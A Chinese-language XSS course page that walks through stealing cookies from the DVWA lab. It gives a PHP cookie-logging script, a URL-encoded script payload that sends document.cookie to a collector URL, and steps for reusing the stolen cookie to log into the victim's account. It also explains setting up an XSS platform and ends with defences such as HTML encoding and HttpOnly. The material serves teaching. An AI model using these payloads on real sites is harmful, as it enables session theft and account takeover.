html获取cookie_知了汇智《XSS攻击-盗取cookie实战》课程文档讲解
文章来源:知了汇智冯老师
今天是《web安全-XSS攻击》系列的最后一篇啦,希望大家好好学习哦~
XSS之
知了汇智-禁卫实验室(GoDun.F)
1. 编写获取cookie的代码cookie.php,并将其放在一个web服务器上。
内容如下:
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>
2. 构造如下URL,并发送给被攻击者:
原始URL:
http://location/dvwa/vulnerabilities/xss_r/?name=
需要进行URL编码:
http://localhost/dvwa/vulnerabilities/xss_r/?name=
%3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E#
3. 受害者点击URL,会跳转到http://127.0.0.1/dvwa/cookie.php,并将cookie写入到了同目录下的cookie.txt中:
4. cookie.txt文件保存了受害者的cookie
5.最后攻击者利用获取到的cookie修改本地的cookie,登录到受害者的账户
试平台部署及应用
知了汇智-禁卫实验室(GoDun.F)
0 XSS测试平台介绍
XSS测试平台是测试XSS漏洞获取cookie并接收Web页面的平台,XSS可以做JS能做的所有事,包括但不限于窃取cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息等。
1 线上可用的XSS平台
https://xsspt.com/index.php?do=login
https://xss8.cc/xss.php
2 自构XSS平台
A:找到Sql注入的开源平台,复制源代然后将其粘贴到网站的目录中
B:创建“xssplatform”的数据库
C:选择XSS平台数据库,导入源码包中的xssplatform.sql文件
D:执行如下SQL命令,将数据库中原有URL地址修改为自己的URL
UPDATE oc_module SET code=REPLACE(code,'http://xsser.me','http://localhost/XSS')
E:将authtest.php中的网址替换为自己的URL
F:注册帐号。
将config.php中的invite改为normal,即为开放注册
在phpMyAdmin中选择oc_user,将注册用过的adminLevel值改为1
配置伪静态文件.htaccess,在平台跟目录下创建.htaccess文件,根据中间件类型写入代码
Nginx:
http://localhost/xss/index.php访问,然后注册,注册成功后将config.php中的改回invite,即关闭开放注册功能
G: http://localhost/xss/index.php访问登录
3 XSS测试平台窃取用户信息实战
XSS的防御
知了汇智-禁卫实验室(GoDun.F)
0 XSS的防御
XSS防御的总体思路是:对用户的输入(和URL参数)进行过滤,对输出进行html编码。也就是对用户提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。
对输入的内容进行过滤,可以分为黑名单过滤和白名单过滤。黑名单过滤虽然可以拦截大部分的XSS攻击,但是还是存在被绕过的风险。白名单过滤虽然可以基本杜绝XSS攻击,但是真实环境中一般是不能进行如此严格的白名单过滤的。
对输出进行html编码,就是通过函数,将用户的输入的数据进行html编码,使其不能作为脚本运行。
如下,是使用php中的htmlspecialchars函数对用户输入的name参数进行html编码,将其转换为html实体
#使用htmlspecialchars函数对用户输入的name参数进行html编码,将其转换为html实体
$name = htmlspecialchars( $_GET[ 'name' ] );
如下,图一是没有进行html编码的,图2是进行了html编码的。经过html编码后script标签被当成了html实体
我们还可以服务端设置会话Cookie的HTTP Only属性,这样,客户端的JS脚本就不能获取Cookie信息了
1 修复总结
因为XSS漏洞涉及输入和输出两部分,所以其修复也分两种
A:过滤输入的数据,包括” ‘ ”,” “ ”,”” “on*”等非法字符。
B:对输出到页面的数据进行相应的编码转换,包括HTML实体编码、JavaScript编码等。
本次关于XSS攻击的课程就结束啦,谢谢大家关注。
html获取cookie_知了汇智《XSS攻击-盗取cookie实战》课程文档讲解相关推荐
- 知了汇智:坚持发展产教融合,做好高校、人才与企业之间的桥梁
6月将正式迎来高校毕业季,大学生就业是聚焦全社会关注的头等大事.5月9日,成都知了汇智科技有限公司(以下简称"知了汇智")组织开展"深化产教融合.聚焦人才培养" ...
- JAVA毕业设计汇美食电子商城计算机源码+lw文档+系统+调试部署+数据库
JAVA毕业设计汇美食电子商城计算机源码+lw文档+系统+调试部署+数据库 JAVA毕业设计汇美食电子商城计算机源码+lw文档+系统+调试部署+数据库 本源码技术栈: 项目架构:B/S架构 开发语言: ...
- android自动化获取toast,成都汇智动力小强哥系列-Appium中Android自动化怎么获取浮层的toast...
原标题:成都汇智动力小强哥系列-Appium中Android自动化怎么获取浮层的toast 小强哥说,虽然比你优秀的人还比你努力,你的努力不见得能超过别人,但是你至少要比昨天的自己更优秀啊.所以每天都 ...
- 达梦数据库DM8飞腾版本、芯版本获取地址,最新达梦数据库各国产化版本获取方法,达梦数据库DM8使用手册、产品文档获取
获取地址: 武汉达梦数据库官网 点击会下载出一个 word 文档,里面有对应的百度网盘地址,再下载就行了. 这个页签有各种最新版本达梦数据库 DM8 的使用手册. 喜欢的点个赞❤吧!
- c++获取常用系统文件夹-桌面-程序安装目录-默认数据-我的文档路径-临时文件夹-常用目录-系统目录
文章目录 1.常用宏介绍 2.将宏转为文件夹 3.获取临时文件夹 4.作者答疑 1.常用宏介绍 宏 介绍 CSIDL_ADMINTOOLS.CSIDL_COMMON_ADMINTOOLS 管理工具 C ...
- python爬网易云_python爬网易云音乐-知了汇智
项目名称:python爬取网易云音乐 项目背景: 利用python爬虫,selenium自动化工具对网易云音乐进行音频爬取并保存到本地.只需输入你需要下载的歌曲名字,就可用程序对歌曲(包括付费歌曲)进 ...
- 熊海CMS网站SQL注入、XSS攻击、cookie篡改
CMS下载地址:https://www.jb51.net/codes/303119.html 代码审计,篡改cookie登录管理员界面 通过信息搜集找到了网站的源码 this.location='?r ...
- poi获取段落位置_Apache POI:从java中的word文档(docx)中提取段落和后续表格
POI中的Word API仍然处于不稳定状态,但是您应该能够通过以下两种方式之一迭代这些段落: XWPFDocument doc = new XWPFDocument(fis); List parag ...
- 怎样获取中国大学MOOC字幕 并制作笔记/可搜索的文档
声明 本文中所涉及的图片以及其他材料内容,均为相关MOOC字幕获取过程当中的操作截图或代码示例,不代表个人的立场.观点.本文的核心内容是技术操作的相关说明. 求求管理员别卡我了,期末季好不容易写了一篇 ...
最新文章
- 如何有效抵抗电脑辐射
- Three.js中实现ASCII文本动画效果
- vue router html后缀,vue-router.html
- 大话数据结构22:几种常见的静态查找算法
- 用nginx TCP反向代理作mail邮件代理
- Qt文档阅读笔记-RadioButton的基本使用
- 淘宝美工设计初学必会技能之PSD分层模板
- 漫画:为什么计算机起始时间是 1970 年 1 月 1 日?
- 亲密关系沟通-【匹配度】调整沟通模式
- PTA: 6-5 删除单链表偶数节点 (20 分)
- uniapp中引入colorUI
- 百度地图API仿链家地图找房 聚合开发 js实现
- 时钟系统安装配置注意事项
- pokemmo客户端管理教程_pokeMMO安卓版教程
- EPICS简单实例2 -- subroutine记录(sub)介绍与使用
- 团队管理的“五大核心要素”,非常重要!
- 视觉SLAM入门 -- 学习笔记 - Part3
- 逆向工程实验_lab0(密码学算法逆向)
- 支持向量机理论(SVM)
- 笔记本高分屏字体模糊_4k/1080p屏幕字体模糊怎么办?win10高分屏笔记本字体模糊太小的解决办法...